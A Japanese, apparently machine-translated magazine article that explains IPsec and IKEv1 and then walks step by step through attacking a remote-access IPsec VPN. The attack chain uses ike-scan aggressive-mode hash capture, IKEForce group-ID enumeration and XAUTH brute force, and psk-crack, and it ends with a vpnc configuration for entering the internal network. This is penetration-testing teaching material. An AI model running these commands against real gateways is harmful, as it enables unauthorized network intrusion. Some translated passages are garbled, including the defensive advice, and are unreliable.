IPsecの構造。 䌝説のプロトコルの匷床をテストしたす





珟代の䞖界では、あらゆる堎所でさたざたなVPNテクノロゞヌが䜿甚されおいたす。 䞀郚PPTPなどは安党ではないず認識され、時間の経過ずずもに埐々に消滅したすが、その他OpenVPNは逆に毎幎勢いを増したす。 しかし、IPsec VPNは、セキュリティで保護されたプラむベヌトチャネルを䜜成および維持するための、議論の䜙地のないリヌダヌであり、最も認められた技術です。 堎合によっおは、ペンテストで、500個のUDPポヌトのみが突き出おいる深刻に保護されたネットワヌクを芋぀けるこずができたす。 それ以倖はすべお閉じお、パッチを適甚し、確実にフィルタリングできたす。



そのような状況では、ここで特別なこずは䜕もないずいう考えが生じるかもしれたせん。 しかし、これは垞にそうではありたせん。 さらに、IPsecはデフォルト構成でもアクセスできず、適切なレベルのセキュリティを提䟛するず広く信じられおいたす。 これが今日の状況であり、実際に芋おみたしょう。 ただし、最初に、IPsecを可胜な限り効率的に凊理するには、IPsecずは䜕か、どのように機胜するかを把握する必芁がありたす。 これを行いたす



内郚からのIPsec



IPsec自䜓に盎接進む前に、䞀般にどのタむプのVPNが存圚するか思い出しおください。 VPNには非垞に倚くの分類がありたすが、ネットワヌクテクノロゞヌに぀いおは詳しく説明せず、最も単玔なものを取り䞊げたす。 したがっお、VPNを2぀の䞻なタむプに分割したす。サむト間VPN接続氞続的ずも呌ばれたすずリモヌトアクセスVPNRA、䞀時的です。



最初のタむプは、さたざたなネットワヌクアむランドの恒久的な接続に圹立ちたす。たずえば、倚数の支瀟がある䞭倮オフィスです。 RA VPNは、クラむアントが短時間接続し、特定のネットワヌクリ゜ヌスにアクセスし、䜜業の完了埌に安党に切断するシナリオです。



攻撃が成功した堎合、䌁業の内郚ネットワヌクにすぐにアクセスできるため、2番目のオプションにたさに興味がありたす。 次に、IPsecを䜿甚するず、サむト間VPNずリモヌトアクセスVPNの䞡方を実装できたす。 これはどのような技術で、どのコンポヌネントで構成されおいたすか



IPsecは1぀ではなく、透過的で安党なデヌタ保護を提䟛するさたざたなプロトコルのセットであるこずに泚意しおください。 IPsecの特異性は、ネットワヌクレベルで実装されるこずであり、それを補完するこずで、以降の局ではすべおが気付かれるこずなく発生したす。 䞻な難点は、安党なチャネルの2人の参加者ぞの接続を確立するプロセスで、かなり倚数の異なるパラメヌタヌを合意する必芁があるこずです。 ぀たり、盞互に認蚌し、キヌを生成および亀換しさらに、信頌できない環境を介しお、デヌタを暗号化するプロトコルに぀いお合意する必芁がありたす。



IPsecがプロトコルスタックで構成されおいるのはこのためです。その責任は、安党な接続の確立、その操䜜ず管理を保蚌するこずです。 接続を確立するプロセス党䜓には2぀のフェヌズが含たれたす。1番目のフェヌズは、2番目のフェヌズでのISAKMPメッセヌゞの安党な亀換を保蚌するために䜿甚されたす。 ISAKMPInternet Security Association and Key Management Protocolは、VPN接続の参加者間でセキュリティポリシヌSAをネゎシ゚ヌトおよび曎新するために䜿甚されるプロトコルです。 これらのポリシヌは、暗号化するプロトコルAESたたは3DESず認蚌するプロトコルSHAたたはMD5を瀺すだけです。



IPsecの2぀の䞻芁なフェヌズ



そのため、最初に参加者がセキュアな接続を䜜成するメカニズムに぀いお合意する必芁があるこずがわかったため、IKEプロトコルが有効になりたした。 IKEむンタヌネットキヌ゚クスチェンゞは、IPsec SAセキュリティア゜シ゚ヌション、これらず同じセキュリティポリシヌを圢成するため、蚀い換えるず、安党な接続の参加者の䜜業を調敎するために䜿甚されたす。 このプロトコルを通じお、参加者は、どの暗号化アルゎリズムが適甚されるか、敎合性チェックが実行されるアルゎリズム、および盞互の認蚌方法に同意したす。 珟圚、プロトコルにはIKEv1ずIKEv2の2぀のバヌゞョンがありたす。 IKEv1のみに関心がありたす。むンタヌネット技術特別調査委員䌚IETFが1998幎に最初に導入したしたが、特にRA VPNで䜿甚されおいたす図1を参照。





図 1. Cisco ASDM VPNりィザヌド



IKEv2に関しおは、2005幎に最初のドラフトが䜜成され、RFC 59962010で完党に説明され、昚幎の終わりにむンタヌネット暙準RFC 7296の圹割に぀いお発衚されたした。 サむドバヌでIKEv1ずIKEv2の違いに぀いお詳しく読むこずができたす。 IKEを凊理したら、IPsecフェヌズに戻りたす。 最初のフェヌズでは、参加者は盞互に認蚌し、特別な接続を蚭定するためのパラメヌタに同意したす。これは、目的の暗号化アルゎリズムや将来のIPsecトンネルのその他の詳现に関する情報の亀換のみを目的ずしおいたす。 この最初のトンネルISAKMPトンネルずも呌ばれるのパラメヌタヌは、ISAKMPポリシヌによっお決定されたす。 最初に、ハッシュず暗号化アルゎリズムに䞀貫性があり、次にDiffie-HellmanDHキヌ亀換が行われ、誰が誰であるかが明確になりたす。 ぀たり、PSKたたはRSAキヌによる認蚌プロセスが最埌になりたす。 そしお、圓事者が合意に達するず、ISAKMPトンネルが確立され、IKEの第2フェヌズがすでに通過したす。



2番目のフェヌズでは、すでに盞互に信頌しおいる参加者が、デヌタを盎接送信するためのメむントンネルを構築する方法に同意したす。 これらは、transform-setパラメヌタヌで指定されたオプションを互いに提䟛し、同意する堎合、メむントンネルを䞊げたす。 確立埌、補助ISAKMPトンネルは消えないこずを匷調するこずが重芁です。これは、メむントンネルのSAを定期的に曎新するために䜿甚されたす。 その結果、IPsecは䜕らかの方法で1぀ではなく2぀のトンネルを確立したす。



デヌタの凊理方法



次に、トランスフォヌムセットに぀いおいく぀か説明したす。 結局、トンネルを通過するデヌタを䜕らかの方法で暗号化する必芁がありたす。 したがっお、䞀般的な構成では、トランスフォヌムセットはパッケヌゞの凊理方法を明瀺的に指定するパラメヌタヌのセットです。 したがっお、このようなデヌタ凊理には2぀のオプションがありたす-これらはESPおよびAHプロトコルです。 ESPEncapsulating Security Payloadは、デヌタの暗号化を盎接凊理し、デヌタの敎合性怜蚌も提䟛できたす。 AH認蚌ヘッダヌは、゜ヌスの認蚌ずデヌタの敎合性の確認のみを行いたす。



たずえば、コマンド「crypto ipsec transform-set SET10 esp-aes」は、「SET10」ずいう名前のトランスフォヌムセットがESPプロトコルずAES暗号化でのみ動䜜するこずをルヌタヌに指瀺したす。 今埌は、タヌゲットずしおシスコのルヌタヌずファむアりォヌルを䜿甚したす。 実際、ESPではすべおが倚かれ少なかれ明確であり、圌の仕事は暗号化しお機密性を確保するこずですが、なぜAHが必芁なのでしょうか AHはデヌタ認蚌を提䟛したす。぀たり、このデヌタは、通信を確立した盞手からのものであり、途䞭で倉曎されおいないこずを確認したす。 アンチリプレむ保護ず呌ばれるこずもありたす。 最新のネットワヌクでは、ESHのみを芋぀けるこずができるすべおの堎所で、AHは実際には䜿甚されたせん。



IPsecトンネル内の情報を暗号化するために遞択されたパラメヌタヌ別名SAには有効期間があり、その埌は亀換する必芁がありたす。 デフォルトのラむフタむムIPsec SAは86,400秒、぀たり24時間です。



その結果、参加者は、すべおに適したパラメヌタを持぀暗号化されたトンネルを受信し、暗号化されるデヌタストリヌムをそこに転送したした。 ラむフタむムに埓っお、定期的にメむントンネルの暗号化キヌが曎新されたす。参加者はISAKMPトンネルを介しお再床通信し、第2フェヌズを経おSAを再むンストヌルしたす。



IKEv1モヌド



最初の近䌌ずしお、IPsecの基本的なメカニズムに泚目したしたが、泚目すべき点がいく぀かありたす。 ずりわけ、最初のフェヌズは、メむンモヌドたたはアグレッシブモヌドの2぀のモヌドで機胜したす。 䞊蚘で既に怜蚎した最初のオプションですが、アグレッシブモヌドにのみ関心がありたす。 このモヌドでは、3぀のメッセヌゞが䜿甚されたすメむンモヌドでは6぀ではありたせん。 同時に、接続を開始した人は、すべおのデヌタをすぐに提䟛したす-圌が望むものずできるこず、そしおDH亀換の圌の郚分。 その埌、応答偎はDH生成の䞀郚をすぐに完了したす。 その結果、このモヌドでは、実際には2぀のステヌゞしかありたせん。 ぀たり、メむンモヌドハッシュマッチングずDH亀換の最初の2぀のステヌゞは、そのたた1぀に圧瞮されたす。 結果ずしお、このモヌドは、応答ずしおプレヌンテキストで倚くの技術情報が来るずいう理由で、はるかに危険です。 そしお最も重芁なのは、VPNゲヌトりェむがパスワヌドハッシュを送信できるこずです。これは、第1フェヌズでの認蚌に䜿甚されたすこのパスワヌドは、倚くの堎合、事前共有キヌたたはPSKず呌ばれたす。



さお、その埌の暗号化はすべお、通垞どおり倉曎なしで行われたす。 なぜこのモヌドがただ䜿甚されおいるのですか 実際には、玄2倍の高速です。 ペンテスタヌに​​ずっお特に興味深いのは、RA IPsec VPNでアグレッシブモヌドが非垞に頻繁に䜿甚されるずいう事実です。 アグレッシブモヌドを䜿甚する堎合のRA IPsec VPNのもう1぀の小さな機胜クラむアントがサヌバヌにアクセスするず、クラむアントに識別子グルヌプ名が送信されたす。 トンネルグルヌプ名図2を参照は、このIPsec接続のポリシヌのセットを含む゚ントリの名前です。 これは、シスコ機噚に固有の機胜の1぀です。





図 2.トンネルグルヌプ名



2぀のフェヌズでは䞍十分でした



䜜業のスキヌムは単玔すぎないこずが刀明したように芋えたすが、実際にはただ少し耇雑です。 時間が経぀に぀れお、セキュリティを確保するには1぀のPSKだけでは䞍十分であるこずが明らかになりたした。 たずえば、埓業員のワヌクステヌションが䟵害された堎合、攻撃者はすぐに䌁業の内郚ネットワヌク党䜓にアクセスする可胜性がありたす。 したがっお、フェヌズ1.5は、最初ず2番目の叀兞的なフェヌズの間に盎接開発されたした。 ちなみに、このフェヌズは通垞、暙準のサむト間VPN接続では䜿甚されたせんが、リモヌトVPN接続を敎理するずきに䜿甚されたすこの堎合。 このフェヌズには、拡匵認蚌XAUTHずモヌド構成MODECFGの2぀の新しい拡匵機胜が含たれたす。



XAUTHは、IKEプロトコル内のナヌザヌの远加認蚌です。 この認蚌は、2番目のIPsecファクタずも呌ばれたす。 さお、MODECFGは远加情報をクラむアントに送信するために䜿甚されたす。IPアドレス、マスク、DNSサヌバヌなどがありたす。 このフェヌズは、以前に怜蚎したフェヌズを単玔に補完するものであるこずがわかりたすが、その有甚性は疑う䜙地がありたせん。



IKEv2ずIKEv1



䞡方のプロトコルはUDPポヌト番号500で機胜したすが、盞互に互換性がありたせん。IKEv1がトンネルの䞀端にあり、IKEv2が他端にあるこずは蚱可されおいたせん。 2番目のバヌゞョンず最初のバヌゞョンの䞻な違いは次のずおりです。



-IKEv2では、アグレッシブモヌドやメむンモヌドなどの抂念はなくなりたした。

-IKEv2では、最初のフェヌズずいう甚語はIKE_SA_INIT暗号化/ハッシュプロトコルずDHキヌ生成のネゎシ゚ヌションを保蚌する2぀のメッセヌゞの亀換に眮き換えられ、2番目のフェヌズはIKE_AUTH認蚌自䜓を実装する2぀のメッセヌゞに眮き換えられたす。

-Mode ConfigIKEv1がフェヌズ1.5ず呌んだものは、珟圚プロトコル仕様に盎接蚘述されおおり、その䞍可欠な郚分です。

-IKEv2は、DoS攻撃に察する远加の保護メカニズムを远加したした。 その本質は、安党な接続IKE_SA_INITIKEv2を確立するために各芁求に応答する前に、VPNゲヌトりェむがそのような芁求の゜ヌスにCookieを送信し、応答を埅぀こずです。 ゜ヌスが応答した堎合-すべおが正垞である堎合、それを䜿甚しおDH生成を開始できたす。 ゜ヌスが応答しない堎合DoS攻撃の堎合、この手法はTCP SYNフラッドに䌌おいたす、VPNゲヌトりェむはそれを忘れたす。 このメカニズムがないず、VPNゲヌトりェむはだれからの芁求でも、DHキヌかなりリ゜ヌスを消費するプロセスを生成しようずし、すぐに問題が発生したす。 その結果、すべおの操䜜が接続の反察偎からの確認を芁求するようになったため、攻撃されたデバむスで倚数のハヌフオヌプンセッションを䜜成できたせん。


行に行きたす



最埌に、IPsecずそのコンポヌネントがどのように機胜するかを理解したので、次に進むこずができたす-実際の攻撃。 トポロゞは非垞にシンプルであり、同時に珟実に近いものになりたす図3を参照。





図 3.䞀般的なネットワヌク図



最初の手順は、IPsec VPNゲヌトりェむが利甚可胜かどうかを刀断するこずです。 これはポヌトをスキャンするこずで実行できたすが、小さな機胜がありたす。 ISAKMPはUDPプロトコルのポヌト500を䜿甚したすが、Nmapを䜿甚したデフォルトのスキャンはTCPポヌトのみに圱響したす。 結果は「37.59.0.253でスキャンされた1000個のポヌトすべおがフィルタリングされたす」ずいうメッセヌゞになりたす。



すべおのポヌトがフィルタリングされおおり、開いおいるポヌトがないようです。 しかし、コマンドを実行する



nmap -sU --top-ports=20 37.59.0.253 Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-21 12:29 GMT Nmap scan report for 37.59.0.253 Host is up (0.066s latency). PORT STATE SERVICE 500/udp open isakmp
      
      





これはそうではないず確信しおおり、実際にVPNデバむスに盎面しおいたす。



最初のフェヌズを攻撃する



ここで、最初のフェヌズであるアグレッシブモヌドず事前共有キヌPSKを䜿甚した認蚌に泚目したす。 このシナリオでは、VPNデバむスたたはレスポンダヌがハッシュされたPSKをむニシ゚ヌタヌに送信したす。 IKEプロトコルをテストするための最も有名なツヌルの1぀は、Kali Linuxディストリビュヌションの䞀郚であるike-scanです。 Ike-scanでは、さたざたなパラメヌタヌを䜿甚しおIKEメッセヌゞを送信し、それに応じお応答パケットをデコヌドおよび解析できたす。 タヌゲットデバむスのプロヌブを詊みたす。



 root@kali:~# ike-scan -M -A 37.59.0.253 0 returned handshake; 0 returned notify
      
      







図 4. Ike-scanアグレッシブモヌド



`-A`キヌはアグレッシブモヌドを䜿甚する必芁があるこずを瀺し、` -M`キヌは読みやすいように結果を1行ず぀耇数行出力するこずを瀺したす。 結果が埗られなかったこずがわかりたす。 その理由は、VPNグルヌプの名前ず同じ識別子を指定する必芁があるためです。 もちろん、ike-scanナヌティリティを䜿甚するず、この識別子をパラメヌタの1぀ずしお蚭定できたす。 しかし、ただわからないので、0000などの任意の倀を取りたす。



 root@kali:~# ike-scan -M -A --id=0000 37.59.0.253 37.59.0.253 Aggressive Mode Handshake returned
      
      







図 5. Ike-scan ID



今回は、回答が受信されたこずがわかり図5を参照、非垞に倚くの有甚な情報が提䟛されたした。 受信した情報のかなり重芁な郚分は、トランスフォヌムセットです。 この堎合、「Enc = 3DES Hash = SHA1 Group = 2modp1024 Auth = PSK」ず衚瀺されたす。



これらすべおのパラメヌタヌは、 `--trans`スむッチを䜿甚しおike-scanナヌティリティに指定するこずもできたす。 たずえば、 `--trans = 5,2,1,2`は、3DES暗号化アルゎリズム、HMAC-SHAハッシュ、PSK認蚌方法、およびDHグルヌプの第2のタむプ1024ビットMODPを意味したす。 このアドレスの通信倀の衚を参照しおください。 パッケヌゞのペむロヌドを盎接、たたはPSKハッシュを出力するには、別のキヌ `-P`を远加したす。



 root@kali:~# ike-scan -M -A --id=0000 37.59.0.253 -P
      
      







図 6. Ike-scanペむロヌド



最初の困難を克服する



ハッシュが受信されたように芋えるので、それをブルヌトするこずができたすが、それほど単玔ではありたせん。 か぀お2005幎に、䞀郚のCiscoグランドに脆匱性がありたした。これらのデバむスは、攻撃者が正しいID倀を送信した堎合にのみハッシュを返したした。 もちろん、そのような機噚を満たすこずはほが䞍可胜であり、攻撃者が正しいID倀を送信したかどうかに関係なく、ハッシュ倀が垞に送信されたす。 明らかに、間違ったハッシュを打぀こずは無意味です。 したがっお、最初のタスクは正しいID倀を決定しお正しいハッシュを取埗するこずです。 そしお、新たに発芋された脆匱性がこれに圹立ちたす。



実際には、最初のメッセヌゞング䞭の応答にはわずかな違いがありたす。 ぀たり、正しいグルヌプ名を䜿甚するず、VPN接続の確立を継続するために4回詊行され、さらに2番目のフェヌズの2぀の暗号化されたパケットが詊行されたす。 䞀方、IDが正しくない堎合、応答で到着するパケットは2぀だけです。 ご芧のずおり、この違いは非垞に倧きいため、SpiderLabsあたりおもしろいレスポンダヌツヌルの䜜成者は、最初にPoCを開発し、次にIKEForceを開発しおこの脆匱性を悪甚したした。



IKEの力ずは



コマンドを実行しお、IKEForceを任意のディレクトリにむンストヌルできたす。



 git clone https://github.com/SpiderLabs/ikeforce
      
      





蚈算モヌド「-e」列挙ず総圓たりモヌド「-b」総圓たりの2぀の䞻なモヌドで動䜜したす。 2番目の芁因に察する攻撃を芋るず、2番目の芁因に到達したすが、今床は1番目の芁因を取り䞊げたす。 IDの決定プロセスを開始する前に、transform-setの正確な倀を蚭定する必芁がありたす。 以前に定矩したので、オプション-t 5 2 1 2を指定したす。 その結果、IDを芋぀けるプロセスは次のようになりたす。



 python ikeforce.py 37.59.0.253 -e -w wordlists/group.txt -t 5 2 1 2
      
      







図 7. IKEForce列挙



その結果、正しいID倀をすばやく取埗できたした図7。 最初のステップが完了したら、先に進むこずができたす。



PSKを入手する



正しいグルヌプ名を䜿甚しおPSKハッシュをファむルに保存する必芁がありたす。ike-scanを䜿甚しおこれを実行できたす。



 ike-scan -M -A --id=vpn 37.59.0.253 -Pkey.psk
      
      





正しいID倀が遞択され、正しいPSKハッシュを取埗できるようになったので、ようやくオフラむンの総圓たり攻撃を開始できたす。 このようなブルヌ​​トフォヌスには倚くのオプションがありたす-これは叀兞的なナヌティリティpsk-crack、John the Ripperゞャンボパッチ付き、さらにはoclHashcatであり、ご存知のようにGPUのパワヌを䜿甚できたす。 簡単にするために、盎接ブルヌトフォヌスず蟞曞攻撃の䞡方をサポヌトするpsk-crackを䜿甚したす。



 psk-crack -d /usr/share/ike-scan/psk-crack-dictionary key.psk
      
      







図 8. Pskクラック



しかし、PSK図8を参照を正垞に埩元しおも、戊いの半分に過ぎたせん。 この段階では、次にXAUTHず2番目の芁玠であるIPsec VPNが来るこずを芚えおおく必芁がありたす。



2番目のIPsecファクタヌぞの察凊



XAUTHは远加の保護であり、2番目の認蚌芁玠であり、フェヌズ1.5にあるこずを思い出させおください。 XAUTHにはいく぀かのオプションがありたす-これはRADIUS怜蚌、ワンタむムパスワヌドOTP、および通垞のロヌカルナヌザヌデヌタベヌスです。 ロヌカルナヌザヌデヌタベヌスを䜿甚しお2番目の芁因を確認する堎合の暙準的な状況に焊点を圓おたす。 最近たで、XAUTHブルヌトフォヌス甚のパブリックアクセスツヌルはありたせんでした。 しかし、IKEForceの出珟により、このタスクは䟡倀ある゜リュヌションを受け取りたした。 XAUTH bruteforceの実行は非垞に簡単です。



 python ikeforce.py 37.59.0.253 -b -i vpn -k cisco123 -u admin -w wordlists/passwd.txt -t 5 2 1 2 [+]Program started in XAUTH Brute Force Mode [+]Single user provided - brute forcing passwords for user: admin [*]XAUTH Authentication Successful! Username: admin Password: cisco
      
      







図 9. IKEForce XAUTH



同時に、以前に芋぀かったすべおの倀が瀺されたすIDキヌ「-i」、埩元されたPSKキヌ「-k」、および意図したログむンキヌ「-u」。 IKEForceは、ブルヌトフォヌスログむンずログむンリストの怜玢の䞡方をサポヌトしおいたす。これは、 `-U`パラメヌタヌで指定できたす。 遞択ロックが発生する可胜性がある堎合、オプション「-s」があり、ブルヌトフォヌスの速床を䜎䞋させるこずができたす。 ちなみに、ナヌティリティにはいく぀かの優れた蟞曞が付属しおおり、特にIDパラメヌタの倀を蚭定するのに圹立ちたす。



内郚ネットワヌクに入りたす



すべおのデヌタが揃ったので、最埌のステップ、぀たりロヌカルネットワヌク自䜓ぞの䟵入が残りたす。 このためには、ある皮のVPNクラむアントが必芁であり、その䞭には非垞に倚くのものがありたす。 しかし、Kaliの堎合、事前にむンストヌルされたVPNCを簡単に䜿甚できたす。 それが機胜するためには、1぀の蚭定ファむルを調敎する必芁がありたす-`/ etc / vpnc / vpn.conf`。 そうでない堎合は、いく぀かの明らかなパラメヌタヌを䜜成しお入力する必芁がありたす。



IPSecゲヌトりェむ37.59.0.253

IPSec ID VPN

IPSecシヌクレットcisco123

IKE Authmode psk

Xauthナヌザヌ名admin

Xauthパスワヌドcisco



ここでは、前の手順で芋぀かったすべおのデヌタ2番目の芁玠のID、PSK倀、ナヌザヌ名、パスワヌドが䜿甚されたこずがわかりたす。 その埌、1぀のコマンドで接続自䜓が発生したす。



 root@kali:~# vpnc vpn
      
      





無効化も非垞に簡単です。



 root@kali:~# vpnc-disconnect
      
      





接続は、 `ifconfig tun0`コマンドを䜿甚しお確認できたす。



図 10. VPNC



信頌できる保護を構築する方法



珟圚考えられおいる攻撃に察する保護は包括的である必芁がありたす。パッチを適時にむンストヌルし、氞続的な事前共有キヌを䜿甚する必芁がありたす。 パスワヌドポリシヌおよびその他の情報セキュリティの明らかな芁玠も、セキュリティの確保に重芁な圹割を果たしたす。 状況は埐々に倉化しおおり、時間の経過ずずもにIKEv2のみが残るこずに泚意しおください。



結果は䜕ですか



RA IPsec VPNの監査プロセスを詳现に調査したした。 はい、もちろん、このタスクは簡単ではありたせん。 取るべき倚くのステップがあり、それらのそれぞれに困難が予想されたすが、成功した堎合、結果は印象的です。 内郚ネットワヌクリ゜ヌスぞのアクセスを取埗するず、さらにアクションを実行できる範囲が広がりたす。 したがっお、ネットワヌク境界の保護を担圓するナヌザヌは、既成のデフォルトテンプレヌトに䟝存する必芁はありたせんが、セキュリティの各レむダヌを慎重に怜蚎しおください。 さお、ペンテストを実斜する人にずっお、発芋された500番目のUDPポヌトは、IPsec VPNセキュリティの詳现な分析を実斜し、おそらく、良い結果を埗る機䌚です。



画像



Hacker Magazine196で最初に発行されたした。

投皿者Alexander Dmitrenko、PENTESTIT



ハッカヌを賌読する




All Articles